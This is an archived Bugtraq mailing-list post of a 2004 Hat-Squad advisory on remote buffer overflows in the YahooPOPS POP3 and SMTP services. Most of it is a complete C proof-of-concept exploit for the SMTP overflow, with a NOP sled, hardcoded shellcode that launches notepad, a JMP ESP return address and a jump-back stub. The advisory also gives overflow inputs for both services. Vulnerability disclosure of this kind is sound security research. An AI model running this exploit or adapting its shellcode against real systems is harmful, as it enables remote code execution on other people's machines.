Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Hat-Squad] Remote Buffer overflow Vulnerability in YahooPOPS

from [Hat-Squad Security Team] Network Security [Permanent Link]
Subject: [Hat-Squad] Remote Buffer overflow Vulnerability in YahooPOPS
Date: 27 Sep 2004 08:36:46 -0000 


Hat-Squad Advisory: Remote Buffer overflow Vulnerability in YahooPOPS
September 22, 2004 

Product: YahooPOPS! 
Vendor URL: http://yahoopops.sourceforge.net
Version: YahooPOPS v0.4 up to v0.6
Vulnerability: Remote Buffer overflows 
Release Date: 27 September 2004

Vendor Status: 
Informed on 24 September 2004
Response: no response
Description:

YahooPOPs! Is an application that provides POP3 access to Yahoo! Mail. It is 
available on the Windows, Linux, Solaris and Mac platforms. This application 
emulates a POP3 & SMTP server. It also enables popular email clients like 
Outlook, Netscape, Eudora, Mozilla, etc., to download email from Yahoo! 
accounts. The Latest version of this Program is 0.6 and released in 23 May 2004 
until now over 120000 users download this program. 

Both POP3 and SMTP services have buffer overflow vulnerabilities. The Remote 
Attacker can send specific Request to these services to cause a Stack based 
buffer overflow which could allow a remote attacker to execute arbitrary code 
or just simply crash the service on a vulnerable system.
 
Details: 

A YahooPOPS 0.x has the Local SMTP and POP3 engines to send and receive emails. 
SMTP service Dose not Enable By default. Users can enable SMTP by Software 
Options. 

A POP3 USER request with more than 180 bytes will start to corrupt the heap. 
POP3 request (Dos Attack):

Telnet localhost 110
+OK POP3 YahooPOPs! Proxy ready 
[USER][180xA][BBBB]

As a result EAX and ECX will be overwritten.

SMTP request:
Sending a request with more than 504 bytes will overwrite ESP and cause a stack 
based overflow.


Telnet localhost 25
220 YahooPOPs! Simple Mail Transfer Service Ready 
[504xA] [BBBB]

As a result The EIP registers will be overwritten.


Proof of concept demo exploit for YPOP! SMTP listener:

#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

#pragma comment(lib,"wsock32.lib")

int main(int argc, char *argv[])
{
static char overflow[1024];

char ret_code[]="\x23\x9b\x02\x10"; //JMP ESP - libcurl.dll
char jump_back[]="\x89\xe3\x66\x81\xeb\xfb\x01\xff\xe3";


/*- harmless code (tnx to snooq) , will open  notepad on the remote machine */
char code[]= "\x33\xc0" // xor eax, eax  slight modification to move esp up
 "\xb0\xf0"             // mov al, 0f0h
 "\x2b\xe0"             // sub esp,eax
 "\x83\xE4\xF0" // and esp, 0FFFFFFF0h
 "\x55" // push ebp
 "\x8b\xec" // mov ebp, esp
 "\x33\xf6" // xor esi, esi
 "\x56" // push esi
 "\x68\x2e\x65\x78\x65" // push 'exe.'
 "\x68\x65\x70\x61\x64" // push 'dape'
 "\x68\x90\x6e\x6f\x74" // push 'ton'
 "\x46" // inc esi
 "\x56" // push esi
 "\x8d\x7d\xf1" // lea edi, [ebp-0xf]
 "\x57" // push edi
 "\xb8\x35\xfd\xe6\x77" // mov eax,XXXX -> WinExec()win2k(SP4)=0x7c4e9c1d
 "\xff\xd0" // call eax
 "\x4e" // dec esi
 "\x56" // push esi
 "\xb8\xfd\x98\xe7\x77" // mov eax,YYYY ->ExitProcess()win2k(SP4)0x7c4ee01a
 "\xff\xd0"; // call eax



   WSADATA wsaData;


   struct hostent *hp;
   struct sockaddr_in sockin;
   char buf[300], *check;
   int sockfd, bytes;
   int plen,i;
   char *hostname;
   unsigned short port;

  if (argc <= 1)
   {
          printf("YPOPs! SMTP Overflow\n");
          printf("By: Behrang Fouladi(behrang@hat-squad.com)\n\n");
      printf("Usage: %s [hostname] [port]\n", argv[0]);
      printf("default port is 25 \n");
        
      exit(0);
   }

   printf("YPOPs! SMTP Overflow\n");
   printf("By: Behrang Fouladi(behrang@hat-squad.com)\n\n");

   hostname = argv[1];
   if (argv[2]) port = atoi(argv[2]);
   else port = atoi("25");

   

   if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
   {
      fprintf(stderr, "Error setting up with WinSock v1.1\n");
      exit(-1);
   }


   hp = gethostbyname(hostname);
   if (hp == NULL)
   {
      printf("ERROR: Uknown host %s\n", hostname);
          printf("%s",hostname);
      exit(-1);
   }

   sockin.sin_family = hp->h_addrtype;
   sockin.sin_port = htons(port);
   sockin.sin_addr = *((struct in_addr *)hp->h_addr);

   if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
   {
      printf("ERROR: Socket Error\n");
      exit(-1);
   }

   if ((connect(sockfd, (struct sockaddr *) &sockin,
                sizeof(sockin))) == SOCKET_ERROR)
   {
      printf("ERROR: Connect Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }

   printf("Connected to [%s] on port [%d], sending overflow....\n",
          hostname, port);

   
   if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
   {
      printf("ERROR: Recv Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(1);
   }

   /* wait for SMTP service welcome*/
   buf[bytes] = '\0';
   check = strstr(buf, "220");
   if (check == NULL)
   {
      printf("ERROR: NO  response from SMTP service\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }
  
 plen=504-sizeof(code);
   memset(overflow,0,sizeof(overflow));
  
   for (i=0; i<plen;i++){strcat(overflow,"\x90");}  

   strcat(overflow,code);
   strcat(overflow,ret_code);
   strcat(overflow,jump_back);
   strcat(overflow,"\n");
  
   if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)
   {
      printf("ERROR: Send Error\n");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }

   printf("Exploit Sent.\n");
  
   closesocket(sockfd);
   WSACleanup();
   return 0;
}

--------------------------------------------------------------------------

Vendor response: no response

Credits:

This vulnerability has been discovered by Nima Majidi 
(nima_majidi@hat-squad.com)

The Original advisory could be found at: 

http://www.hat-squad.com/en/000075.html
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Hat-Squad] Remote Buffer overflow Vulnerability in YahooPOPS, Hat-Squad Security Team <=
Previous by Date:  [CLA-2004:869] Conectiva Security Announcement - kernel, Conectiva Updates
Next by Date:  RE: Diebold Global Election Management System (GEMS) Backdoor, Paul Wouters
Previous by Thread:  [CLA-2004:869] Conectiva Security Announcement - kernel, Conectiva Updates
Next by Thread:  GDI Virus in the wild., Ben
Indexes:  [Date] [Thread] [Top] [All Lists]